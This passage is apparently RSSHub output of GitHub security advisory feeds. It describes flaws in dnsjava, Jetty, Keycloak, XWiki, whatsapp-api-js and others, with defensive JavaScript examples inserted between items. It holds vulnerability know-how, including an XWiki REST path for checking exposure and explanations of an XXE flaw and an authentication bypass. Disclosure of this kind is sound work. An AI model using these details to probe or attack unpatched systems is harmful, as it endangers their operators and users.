<h3 id="patches">Patches</h3>
<p>Users should upgrade to dnsjava v3.6.0</p>
<h3 id="workarounds">Workarounds</h3>
<p>Although not recommended, only using a non-validating resolver, will remove the vulnerability.</p>
<h3 id="references">References</h3>
<p><a href="https://www.athene-center.de/en/keytrap">https://www.athene-center.de/en/keytrap</a></p>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/dnsjava/dnsjava/security/advisories/GHSA-mmwx-rj87-vfgr">https://github.com/dnsjava/dnsjava/security/advisories/GHSA-mmwx-rj87-vfgr</a></li>
<li><a href="https://github.com/dnsjava/dnsjava/commit/711af79be3214f52daa5c846b95766dc0a075116">https://github.com/dnsjava/dnsjava/commit/711af79be3214f52daa5c846b95766dc0a075116</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-50868">https://nvd.nist.gov/vuln/detail/CVE-2023-50868</a></li>
<li><a href="https://github.com/advisories/GHSA-pv4h-p8jr-6cv2">https://github.com/advisories/GHSA-pv4h-p8jr-6cv2</a></li>
<li><a href="https://github.com/advisories/GHSA-mmwx-rj87-vfgr">https://github.com/advisories/GHSA-mmwx-rj87-vfgr</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-mmwx-rj87-vfgr</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-mmwx-rj87-vfgr</guid>
<author>GitHub</author>
</item>
<item>
<title>[dnsjava:dnsjava] DNSJava affected by KeyTrap - NSEC3 closest encloser proof can exhaust CPU resources</title>
<description><h3 id="impact">Impact</h3>
<p>Users using the <code>ValidatingResolver</code> for DNSSEC validation can run into CPU exhaustion with specially crafted DNSSEC-signed zones.</p>
<h3 id="patches">Patches</h3>
<p>Users should upgrade to dnsjava v3.6.0</p>
<h3 id="workarounds">Workarounds</h3>
<p>Although not recommended, only using a non-validating resolver, will remove the vulnerability.</p>
<h3 id="references">References</h3>
<p><a href="https://www.athene-center.de/en/keytrap">https://www.athene-center.de/en/keytrap</a></p>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/dnsjava/dnsjava/security/advisories/GHSA-mmwx-rj87-vfgr">https://github.com/dnsjava/dnsjava/security/advisories/GHSA-mmwx-rj87-vfgr</a></li>
<li><a href="https://github.com/dnsjava/dnsjava/commit/711af79be3214f52daa5c846b95766dc0a075116">https://github.com/dnsjava/dnsjava/commit/711af79be3214f52daa5c846b95766dc0a075116</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-50868">https://nvd.nist.gov/vuln/detail/CVE-2023-50868</a></li>
<li><a href="https://github.com/advisories/GHSA-pv4h-p8jr-6cv2">https://github.com/advisories/GHSA-pv4h-p8jr-6cv2</a></li>
<li><a href="https://github.com/advisories/GHSA-mmwx-rj87-vfgr">https://github.com/advisories/GHSA-mmwx-rj87-vfgr</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-mmwx-rj87-vfgr</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-mmwx-rj87-vfgr</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.jitsi:dnssecjava] DNSJava vulnerable to KeyTrap - Denial-of-Service Algorithmic Complexity Attacks</title>
<description><h3 id="impact">Impact</h3>
<p>Users using the <code>ValidatingResolver</code> for DNSSEC validation can run into CPU exhaustion with specially crafted DNSSEC-signed zones.</p>
<h3 id="patches">Patches</h3>
<p>Users should upgrade to dnsjava v3.6.0</p>
<h3 id="workarounds">Workarounds</h3>
<p>Although not recommended, using only a non-validating resolver will remove the vulnerability.</p>
<h3 id="references">References</h3>
<p><a href="https://www.athene-center.de/en/keytrap">https://www.athene-center.de/en/keytrap</a></p>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/dnsjava/dnsjava/security/advisories/GHSA-crjg-w57m-rqqf">https://github.com/dnsjava/dnsjava/security/advisories/GHSA-crjg-w57m-rqqf</a></li>
<li><a href="https://github.com/dnsjava/dnsjava/commit/07ac36a11578cc1bce0cd8ddf2fe568f062aee78">https://github.com/dnsjava/dnsjava/commit/07ac36a11578cc1bce0cd8ddf2fe568f062aee78</a></li>
<li><a href="https://github.com/dnsjava/dnsjava/commit/3ddc45ce8cdb5c2274e10b7401416f497694e1cf">https://github.com/dnsjava/dnsjava/commit/3ddc45ce8cdb5c2274e10b7401416f497694e1cf</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-50387">https://nvd.nist.gov/vuln/detail/CVE-2023-50387</a></li>
<li><a href="https://github.com/advisories/GHSA-8459-gg55-8qjj">https://github.com/advisories/GHSA-8459-gg55-8qjj</a></li>
<li><a href="https://github.com/advisories/GHSA-crjg-w57m-rqqf">https://github.com/advisories/GHSA-crjg-w57m-rqqf</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-crjg-w57m-rqqf</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-crjg-w57m-rqqf</guid>
<author>GitHub</author>
</item>
<item>
<title>[dnsjava:dnsjava] DNSJava vulnerable to KeyTrap - Denial-of-Service Algorithmic Complexity Attacks</title>
<description><h3 id="impact">Impact</h3>
<p>Users using the <code>ValidatingResolver</code> for DNSSEC validation can run into CPU exhaustion with specially crafted DNSSEC-signed zones.</p>
<h3 id="patches">Patches</h3>
<p>Users should upgrade to dnsjava v3.6.0</p>
<h3 id="workarounds">Workarounds</h3>
<p>Although not recommended, using only a non-validating resolver will remove the vulnerability.</p>
<h3 id="references">References</h3>
<p><a href="https://www.athene-center.de/en/keytrap">https://www.athene-center.de/en/keytrap</a></p>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/dnsjava/dnsjava/security/advisories/GHSA-crjg-w57m-rqqf">https://github.com/dnsjava/dnsjava/security/advisories/GHSA-crjg-w57m-rqqf</a></li>
<li><a href="https://github.com/dnsjava/dnsjava/commit/07ac36a11578cc1bce0cd8ddf2fe568f062aee78">https://github.com/dnsjava/dnsjava/commit/07ac36a11578cc1bce0cd8ddf2fe568f062aee78</a></li>
<li><a href="https://github.com/dnsjava/dnsjava/commit/3ddc45ce8cdb5c2274e10b7401416f497694e1cf">https://github.com/dnsjava/dnsjava/commit/3ddc45ce8cdb5c2274e10b7401416f497694e1cf</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-50387">https://nvd.nist.gov/vuln/detail/CVE-2023-50387</a></li>
<li><a href="https://github.com/advisories/GHSA-8459-gg55-8qjj">https://github.com/advisories/GHSA-8459-gg55-8qjj</a></li>
<li><a href="https://github.com/advisories/GHSA-crjg-w57m-rqqf">https://github.com/advisories/GHSA-crjg-w57m-rqqf</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-crjg-w57m-rqqf</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-crjg-w57m-rqqf</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.eclipse.edc:transfer-data-plane] Eclipse Dataspace Components's ConsumerPullTransferTokenValidationApiController doesn't check for token validity</title>
<description><p>In Eclipse Dataspace Components, from version 0.5.0 and before version 0.9.0, the <code>ConsumerPullTransferTokenValidationApiController</code> does not check token validity (expiry, not-before and issuance date), which allows an attacker to bypass the token expiration check. The issue requires a dataplane configured to support HTTP proxy consumer pull AND the "transfer-data-plane" module to be included. The affected code was marked deprecated from version 0.6.0 in favour of Dataplane Signaling. In 0.9.0 the vulnerable code has been removed.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-8642">https://nvd.nist.gov/vuln/detail/CVE-2024-8642</a></li>
<li><a href="https://github.com/eclipse-edc/Connector/commit/04899e91dcdb4a407db4eb7af3e7b6ff9a9e9ad6">https://github.com/eclipse-edc/Connector/commit/04899e91dcdb4a407db4eb7af3e7b6ff9a9e9ad6</a></li>
<li><a href="https://github.com/eclipse-edc/Connector/releases/tag/v0.9.0">https://github.com/eclipse-edc/Connector/releases/tag/v0.9.0</a></li>
<li><a href="https://gitlab.eclipse.org/security/cve-assignement/-/issues/28">https://gitlab.eclipse.org/security/cve-assignement/-/issues/28</a></li>
<li><a href="https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/234">https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/234</a></li>
<li><a href="https://github.com/eclipse-edc/Connector/blob/bcb2e42aee82ce1863be3dcbdab29919d39a0e97/extensions/control-plane/transfer/transfer-data-plane/src/main/java/org/eclipse/edc/connector/controlplane/transfer/dataplane/api/ConsumerPullTransferTokenValidationApiController.java">https://github.com/eclipse-edc/Connector/blob/bcb2e42aee82ce1863be3dcbdab29919d39a0e97/extensions/control-plane/transfer/transfer-data-plane/src/main/java/org/eclipse/edc/connector/controlplane/transfer/dataplane/api/ConsumerPullTransferTokenValidationApiController.java</a></li>
<li><a href="https://github.com/advisories/GHSA-8259-2x72-2gvc">https://github.com/advisories/GHSA-8259-2x72-2gvc</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-8259-2x72-2gvc</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-8259-2x72-2gvc</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.glassfish.main.web:web-core] Eclipse Glassfish URL redirection vulnerability</title>
<description><p>In Eclipse Glassfish versions prior to 7.0.10, a URL redirection vulnerability to untrusted sites existed.
This vulnerability is caused by the vulnerability (CVE-2023-41080) in the Apache code included in GlassFish.
This vulnerability only affects applications that are explicitly deployed to the root context ('/').</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-8646">https://nvd.nist.gov/vuln/detail/CVE-2024-8646</a></li>
<li><a href="https://github.com/eclipse-ee4j/glassfish/pull/24655">https://github.com/eclipse-ee4j/glassfish/pull/24655</a></li>
<li><a href="https://gitlab.eclipse.org/security/cve-assignement/-/issues/34">https://gitlab.eclipse.org/security/cve-assignement/-/issues/34</a></li>
<li><a href="https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/163">https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/163</a></li>
<li><a href="https://glassfish.org/download">https://glassfish.org/download</a></li>
<li><a href="https://github.com/eclipse-ee4j/glassfish/commit/06b80012761d07f6e40e40aa6b0133465b0bd145">https://github.com/eclipse-ee4j/glassfish/commit/06b80012761d07f6e40e40aa6b0133465b0bd145</a></li>
<li><a href="https://github.com/advisories/GHSA-7gq2-vwq9-w8vw">https://github.com/advisories/GHSA-7gq2-vwq9-w8vw</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-7gq2-vwq9-w8vw</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-7gq2-vwq9-w8vw</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.keycloak:keycloak-core] Keycloak Denial of Service vulnerability</title>
<description><p>A denial of service vulnerability was found in Keycloak where the number of attributes per object is not limited. By sending repeated HTTP requests, an attacker could cause resource exhaustion when the application sends back rows with long attribute values.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-6841">https://nvd.nist.gov/vuln/detail/CVE-2023-6841</a></li>
<li><a href="https://access.redhat.com/security/cve/CVE-2023-6841">https://access.redhat.com/security/cve/CVE-2023-6841</a></li>
<li><a href="https://bugzilla.redhat.com/show_bug.cgi?id=2254714">https://bugzilla.redhat.com/show_bug.cgi?id=2254714</a></li>
<li><a href="https://github.com/advisories/GHSA-w97f-w3hq-36g2">https://github.com/advisories/GHSA-w97f-w3hq-36g2</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-w97f-w3hq-36g2</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-w97f-w3hq-36g2</guid>
<author>GitHub</author>
</item>
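The Keycloak advisory above names the missing control: no bound on how many attributes an object may carry, nor on how large they may be. As an added example, not Keycloak code, here is the kind of limit check a service should run on client-supplied attribute maps before persisting them. The limit values are illustrative, not Keycloak's own.

```javascript
// Added example (not Keycloak code): bound the number and size of
// attributes accepted on an object before it is persisted, so a client
// cannot make the server store and return arbitrarily large rows.
// The limits below are illustrative values, not Keycloak's.
const DEFAULT_LIMITS = {
  maxAttributes: 50,        // attributes per object
  maxKeyLength: 64,         // bytes per attribute name
  maxValueLength: 1024,     // bytes per single value
  maxValuesPerAttribute: 10,
  maxTotalBytes: 16 * 1024, // all names and values combined
};

// attributes: { [name: string]: string | string[] } as sent by a client.
// Returns { ok: true } or { ok: false, reason, attribute? }.
function checkAttributeLimits(attributes, limits = DEFAULT_LIMITS) {
  if (attributes === null || typeof attributes !== 'object' || Array.isArray(attributes)) {
    return { ok: false, reason: 'attributes-not-an-object' };
  }
  const names = Object.keys(attributes);
  if (names.length > limits.maxAttributes) {
    return { ok: false, reason: 'too-many-attributes' };
  }
  let total = 0;
  for (const name of names) {
    const nameBytes = Buffer.byteLength(name, 'utf8');
    if (nameBytes === 0 || nameBytes > limits.maxKeyLength) {
      return { ok: false, reason: 'attribute-name-too-long', attribute: name };
    }
    total += nameBytes;
    const raw = attributes[name];
    const values = Array.isArray(raw) ? raw : [raw];
    if (values.length > limits.maxValuesPerAttribute) {
      return { ok: false, reason: 'too-many-values', attribute: name };
    }
    for (const v of values) {
      if (typeof v !== 'string') return { ok: false, reason: 'value-not-a-string', attribute: name };
      const vBytes = Buffer.byteLength(v, 'utf8');
      if (vBytes > limits.maxValueLength) return { ok: false, reason: 'value-too-long', attribute: name };
      total += vBytes;
    }
    // Per-field limits alone still allow maxAttributes * maxValueLength bytes,
    // so a total budget is enforced as well.
    if (total > limits.maxTotalBytes) return { ok: false, reason: 'payload-too-large' };
  }
  return { ok: true };
}
```

Sizes are measured in UTF-8 bytes rather than string length so that multi-byte characters cannot slip past a byte-based storage limit.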
<item>
<title>[org.eclipse.jetty:jetty-xml] Eclipse Jetty XmlParser allows arbitrary DOCTYPE declarations</title>
<description><h3 id="from-the-reporter">From the reporter</h3>
<blockquote>
<p><code>XmlParser</code> is vulnerable to XML external entity (XXE) vulnerability.
XmlParser is being used when parsing Jetty’s xml configuration files. An attacker might exploit
this vulnerability in order to achieve SSRF or cause a denial of service.
One possible scenario is importing a (remote) malicious WAR into a Jetty’s server, while the
WAR includes a malicious web.xml.</p>
</blockquote>
<h3 id="impact">Impact</h3>
<p>There are no circumstances in a normally deployed Jetty server where potentially hostile XML is given to the XmlParser class without the attacker already having arbitrary access to the server. I.e. in order to exploit <code>XmlParser</code> the attacker would already have the ability to deploy and execute hostile code. Specifically, Jetty has no protection against malicious web applications, and potentially hostile web applications should only be run in isolated virtualisation.</p>
<p>Thus this is not considered a vulnerability of the Jetty server itself, as any such usage of the Jetty XmlParser is equally vulnerable as a direct usage of the JVM-supplied SAX parser. No CVE will be allocated to this advisory.</p>
<p>However, any direct usage of the <code>XmlParser</code> class by an application may be vulnerable. The impact would depend greatly on how the application uses <code>XmlParser</code>, but it could be a denial of service due to large entity expansion, or possibly revealing local files if the XML results are accessible remotely.</p>
<h3 id="patches">Patches</h3>
<p>The ability to configure the SAXParserFactory to fit the needs of your particular XML parser implementation has been merged as part of PR #10067.</p>
<h3 id="workarounds">Workarounds</h3>
<p>Don't use <code>XmlParser</code> to parse data from users.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/eclipse/jetty.project/security/advisories/GHSA-58qw-p7qm-5rvh">https://github.com/eclipse/jetty.project/security/advisories/GHSA-58qw-p7qm-5rvh</a></li>
<li><a href="https://github.com/eclipse/jetty.project/pull/10067">https://github.com/eclipse/jetty.project/pull/10067</a></li>
<li><a href="https://github.com/eclipse/jetty.project/releases/tag/jetty-10.0.16">https://github.com/eclipse/jetty.project/releases/tag/jetty-10.0.16</a></li>
<li><a href="https://github.com/eclipse/jetty.project/releases/tag/jetty-11.0.16">https://github.com/eclipse/jetty.project/releases/tag/jetty-11.0.16</a></li>
<li><a href="https://github.com/eclipse/jetty.project/releases/tag/jetty-12.0.0">https://github.com/eclipse/jetty.project/releases/tag/jetty-12.0.0</a></li>
<li><a href="https://github.com/eclipse/jetty.project/releases/tag/jetty-9.4.52.v20230823">https://github.com/eclipse/jetty.project/releases/tag/jetty-9.4.52.v20230823</a></li>
<li><a href="https://github.com/advisories/GHSA-58qw-p7qm-5rvh">https://github.com/advisories/GHSA-58qw-p7qm-5rvh</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-58qw-p7qm-5rvh</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-58qw-p7qm-5rvh</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.eclipse.jetty:jetty-openid] Jetty's OpenId Revoked authentication allows one request</title>
<description><p>If a Jetty <code>OpenIdAuthenticator</code> uses the optional nested <code>LoginService</code>, and that <code>LoginService</code> decides to revoke an already authenticated user, then the current request will still treat the user as authenticated. The authentication is then cleared from the session and subsequent requests will not be treated as authenticated. </p>
<p>So a request on a previously authenticated session could be allowed to bypass authentication after it had been rejected by the <code>LoginService</code>.</p>
<h3 id="impact">Impact</h3>
<p>This impacts usages of jetty-openid which have configured a nested <code>LoginService</code> and where that <code>LoginService</code> is capable of rejecting previously authenticated users.</p>
<h3 id="original-report">Original Report</h3>
<blockquote>
<p>Working on a custom OpenIdAuthenticator, I discovered the following:</p>
<p><a href="https://github.com/eclipse/jetty.project/blob/jetty-10.0.14/jetty-openid/src/main/java/org/eclipse/jetty/security/openid/OpenIdAuthenticator.java#L505">https://github.com/eclipse/jetty.project/blob/jetty-10.0.14/jetty-openid/src/main/java/org/eclipse/jetty/security/openid/OpenIdAuthenticator.java#L505</a></p>
<p>In the case where the LoginService does return that the authentication has been revoked (from the validate() call on line 463), the OpenIdAuthenticator removes the authentication from the session; however the current request still proceeds as if authenticated, since it falls through to "return authentication" on line 505.</p>
<p>This is fixed by moving the line 505 (and associated debug log) inside the else block that ends on line 502, instead of outside it. Then the revocation case will run through to line 517 and will trigger a new OpenId authentication which I think is correct.</p>
<p>I think this revocation can only occur if you do attach a separate LoginService to the OpenIdLoginService, but in that case the revoked authentication will still let the next request through (and possibly more than one if they are very close to simultaneous).</p>
<p>Technically I think this is a security vulnerability, if a very minor one, so I'm sending this off-list.</p>
</blockquote>
<h3 id="patched-versions">Patched Versions</h3>
<p>Fixed in Jetty Versions:</p>
<ul>
<li>9.4.52 - fixed in PR <a href="https://github.com/eclipse/jetty.project/pull/9660">https://github.com/eclipse/jetty.project/pull/9660</a></li>
<li>10.0.16 - fixed in PR <a href="https://github.com/eclipse/jetty.project/pull/9528">https://github.com/eclipse/jetty.project/pull/9528</a></li>
<li>11.0.16 - fixed in PR <a href="https://github.com/eclipse/jetty.project/pull/9528">https://github.com/eclipse/jetty.project/pull/9528</a></li>
<li>12.0.0 - not impacted (already has fix)</li>
</ul>
<h3 id="workaround">Workaround</h3>
<p>Upgrade your version of Jetty.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/eclipse/jetty.project/pull/9528">https://github.com/eclipse/jetty.project/pull/9528</a></li>
<li><a href="https://github.com/eclipse/jetty.project/pull/9660">https://github.com/eclipse/jetty.project/pull/9660</a></li>
</ul>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/eclipse/jetty.project/security/advisories/GHSA-pwh8-58vv-vw48">https://github.com/eclipse/jetty.project/security/advisories/GHSA-pwh8-58vv-vw48</a></li>
<li><a href="https://github.com/eclipse/jetty.project/pull/9528">https://github.com/eclipse/jetty.project/pull/9528</a></li>
<li><a href="https://github.com/eclipse/jetty.project/pull/9660">https://github.com/eclipse/jetty.project/pull/9660</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-41900">https://nvd.nist.gov/vuln/detail/CVE-2023-41900</a></li>
<li><a href="https://www.debian.org/security/2023/dsa-5507">https://www.debian.org/security/2023/dsa-5507</a></li>
<li><a href="https://security.netapp.com/advisory/ntap-20231110-0004">https://security.netapp.com/advisory/ntap-20231110-0004</a></li>
<li><a href="https://github.com/advisories/GHSA-pwh8-58vv-vw48">https://github.com/advisories/GHSA-pwh8-58vv-vw48</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-pwh8-58vv-vw48</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-pwh8-58vv-vw48</guid>
<author>GitHub</author>
</item>
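The report above pins the bug to control flow: the revocation branch clears the session but then falls through to the same `return authentication` as the success branch. As an added example that is not Jetty code, the two shapes are reduced to plain functions so the difference can be exercised with a session and a revoking login service. `session`, `loginService` and the user object are simplified stand-ins for this demo, not Jetty's types.

```javascript
// Added example (not Jetty code): the control flow described in the
// advisory in a minimal request-handling sketch. authenticateVulnerable
// mirrors the bug (a just-revoked user still passes the current request);
// authenticateFixed returns "not authenticated" as soon as the nested login
// service rejects the cached user. Session, loginService and user objects
// are simplified stand-ins, not Jetty's types.

// A nested login service that can revoke users between requests.
function makeLoginService(revokedUsers = new Set()) {
  return {
    validate(user) { return !revokedUsers.has(user.name); },
    revoke(name) { revokedUsers.add(name); },
  };
}

const NOT_AUTHENTICATED = null;

// Vulnerable: clears the session but still returns the stale authentication.
function authenticateVulnerable(session, loginService) {
  const authentication = session.authentication;
  if (!authentication) return NOT_AUTHENTICATED; // would start a new OpenID flow
  if (!loginService.validate(authentication.user)) {
    delete session.authentication; // revocation noticed here...
  }
  return authentication; // ...but this request still proceeds as authenticated
}

// Fixed: the cached authentication is returned only when validation succeeds.
function authenticateFixed(session, loginService) {
  const authentication = session.authentication;
  if (!authentication) return NOT_AUTHENTICATED;
  if (!loginService.validate(authentication.user)) {
    delete session.authentication;
    return NOT_AUTHENTICATED; // caller must re-run the OpenID login
  }
  return authentication;
}

// Drive three requests on one session, revoking the user after the first.
// Returns which of the requests were treated as authenticated.
function simulate(authenticate) {
  const loginService = makeLoginService();
  const session = { authentication: { user: { name: 'alice' } } };
  const first = authenticate(session, loginService) !== NOT_AUTHENTICATED;
  loginService.revoke('alice');
  const afterRevoke = authenticate(session, loginService) !== NOT_AUTHENTICATED;
  const next = authenticate(session, loginService) !== NOT_AUTHENTICATED;
  return { first, afterRevoke, next };
}
```

Running `simulate(authenticateVulnerable)` shows the one-request window the advisory describes: the request made right after revocation is still served as authenticated, and only the following one is refused.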
<item>
<title>[org.xwiki.platform:xwiki-platform-rest-server] XWiki Platform document history including authors of any page exposed to unauthorized actors</title>
<description><h3 id="impact">Impact</h3>
<p>The REST API exposes the history of any page in XWiki of which the attacker knows the name. The exposed information includes for each modification of the page the time of the modification, the version number, the author of the modification (both username and displayed name) and the version comment. This information is exposed regardless of the rights setup, and even when the wiki is configured to be fully private.</p>
<p>On a private wiki, this can be tested by accessing <code>/xwiki/rest/wikis/xwiki/spaces/Main/pages/WebHome/history</code>; if this shows the history of the main page then the installation is vulnerable.</p>
<h3 id="patches">Patches</h3>
<p>This has been patched in XWiki 15.10.9 and XWiki 16.3.0RC1.</p>
<h3 id="workarounds">Workarounds</h3>
<p>There aren't any known workarounds apart from upgrading to a fixed version.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://jira.xwiki.org/browse/XWIKI-22052">https://jira.xwiki.org/browse/XWIKI-22052</a></li>
<li><a href="https://github.com/xwiki/xwiki-platform/commit/9cbca9808300797c67779bb9a665d85cf9e3d4b8">https://github.com/xwiki/xwiki-platform/commit/9cbca9808300797c67779bb9a665d85cf9e3d4b8</a></li>
</ul>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-pvmm-55r5-g3mm">https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-pvmm-55r5-g3mm</a></li>
<li><a href="https://github.com/xwiki/xwiki-platform/commit/26482ee5d29fc21f31134d1ee13db48716e89e0f">https://github.com/xwiki/xwiki-platform/commit/26482ee5d29fc21f31134d1ee13db48716e89e0f</a></li>
<li><a href="https://github.com/xwiki/xwiki-platform/commit/9cbca9808300797c67779bb9a665d85cf9e3d4b8">https://github.com/xwiki/xwiki-platform/commit/9cbca9808300797c67779bb9a665d85cf9e3d4b8</a></li>
<li><a href="https://jira.xwiki.org/browse/XWIKI-22052">https://jira.xwiki.org/browse/XWIKI-22052</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45591">https://nvd.nist.gov/vuln/detail/CVE-2024-45591</a></li>
<li><a href="https://github.com/advisories/GHSA-pvmm-55r5-g3mm">https://github.com/advisories/GHSA-pvmm-55r5-g3mm</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-pvmm-55r5-g3mm</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-pvmm-55r5-g3mm</guid>
<author>GitHub</author>
</item>
</channel>
</rss>
http://localhost:1200/github-advisor/data/npm - Success ✔️
<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" version="2.0">
<channel>
<title>GitHub Advisory Database RSS - npm</title>
<link>https://github.com/advisories</link>
<atom:link href="http://localhost:1200/github-advisor/data/npm" rel="self" type="application/rss+xml"></atom:link>
<description>GitHub Advisory Database RSS - npm - Powered by RSSHub</description>
<generator>RSSHub</generator>
<webMaster>contact@rsshub.app (RSSHub)</webMaster>
<language>en</language>
<lastBuildDate>Fri, 13 Sep 2024 16:19:17 GMT</lastBuildDate>
<ttl>5</ttl>
<item>
<title>[whatsapp-api-js] whatsapp-api-js fails to validate message's signature</title>
<description><h3 id="impact">Impact</h3>
<p>Incorrect access control: anyone using the <code>post</code> or <code>verifyRequestSignature</code> methods to handle messages is impacted.</p>
<h3 id="patches">Patches</h3>
<p>Patched in version 4.0.3.</p>
<h3 id="workarounds">Workarounds</h3>
<p>It's possible to check the payload validation using <code>WhatsAppAPI.verifyRequestSignature</code> and expect <code>false</code> when the signature is valid.</p>
<pre><code class="language-ts">function doPost(payload, header_signature) {
  // In affected versions verifyRequestSignature returns true for an INVALID
  // signature, so reject the request when it returns true.
  if (whatsapp.verifyRequestSignature(payload.toString(), header_signature)) {
    throw 403;
  }
  // Now the payload is correctly verified
  whatsapp.post(payload);
}
</code></pre>
<h3 id="references">References</h3>
<p><a href="https://github.com/Secreto31126/whatsapp-api-js/pull/371">https://github.com/Secreto31126/whatsapp-api-js/pull/371</a></p>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/Secreto31126/whatsapp-api-js/security/advisories/GHSA-mwhf-vhr5-7j23">https://github.com/Secreto31126/whatsapp-api-js/security/advisories/GHSA-mwhf-vhr5-7j23</a></li>
<li><a href="https://github.com/Secreto31126/whatsapp-api-js/pull/371">https://github.com/Secreto31126/whatsapp-api-js/pull/371</a></li>
<li><a href="https://github.com/Secreto31126/whatsapp-api-js/commit/56620c65126427496a94d176082fbd8393a95b6d">https://github.com/Secreto31126/whatsapp-api-js/commit/56620c65126427496a94d176082fbd8393a95b6d</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45607">https://nvd.nist.gov/vuln/detail/CVE-2024-45607</a></li>
<li><a href="https://github.com/advisories/GHSA-mwhf-vhr5-7j23">https://github.com/advisories/GHSA-mwhf-vhr5-7j23</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-mwhf-vhr5-7j23</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-mwhf-vhr5-7j23</guid>
<author>GitHub</author>
</item>
<item>
<title>[aws-iot-device-sdk-v2] Improper certificate management in AWS IoT Device SDK v2</title>
<description><p>Connections initialized by the AWS IoT Device SDK v2 for Java (versions prior to 1.3.3), Python (versions prior to 1.5.18), C++ (versions prior to 1.12.7) and Node.js (versions prior to 1.5.1) did not verify server certificate hostname during TLS handshake when overriding Certificate Authorities (CA) in their trust stores on Windows. This issue has been addressed in aws-c-io submodule versions 0.9.13 onward. This issue affects: Amazon Web Services AWS IoT Device SDK v2 for Java versions prior to 1.3.3 on Microsoft Windows. Amazon Web Services AWS IoT Device SDK v2 for Python versions prior to 1.5.18 on Microsoft Windows. Amazon Web Services AWS IoT Device SDK v2 for C++ versions prior to 1.12.7 on Microsoft Windows. Amazon Web Services AWS IoT Device SDK v2 for Node.js versions prior to 1.5.3 on Microsoft Windows.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-40828">https://nvd.nist.gov/vuln/detail/CVE-2021-40828</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2/commit/67950ad2a02f2f9355c310b69dc9226b017f32f2">https://github.com/aws/aws-iot-device-sdk-java-v2/commit/67950ad2a02f2f9355c310b69dc9226b017f32f2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2/commit/4be41394f1aee979e6f4b012fcb01eecabd0c08d">https://github.com/aws/aws-iot-device-sdk-js-v2/commit/4be41394f1aee979e6f4b012fcb01eecabd0c08d</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2/commit/fd4c0ba04b35eab9e20c635af5548fcc5a92d8be">https://github.com/aws/aws-iot-device-sdk-python-v2/commit/fd4c0ba04b35eab9e20c635af5548fcc5a92d8be</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-cpp-v2">https://github.com/aws/aws-iot-device-sdk-cpp-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2">https://github.com/aws/aws-iot-device-sdk-java-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2">https://github.com/aws/aws-iot-device-sdk-js-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2">https://github.com/aws/aws-iot-device-sdk-python-v2</a></li>
<li><a href="https://github.com/advisories/GHSA-94jq-q5v2-76wj">https://github.com/advisories/GHSA-94jq-q5v2-76wj</a></li>
<li><a href="https://github.com/awslabs/aws-c-io">https://github.com/awslabs/aws-c-io</a></li>
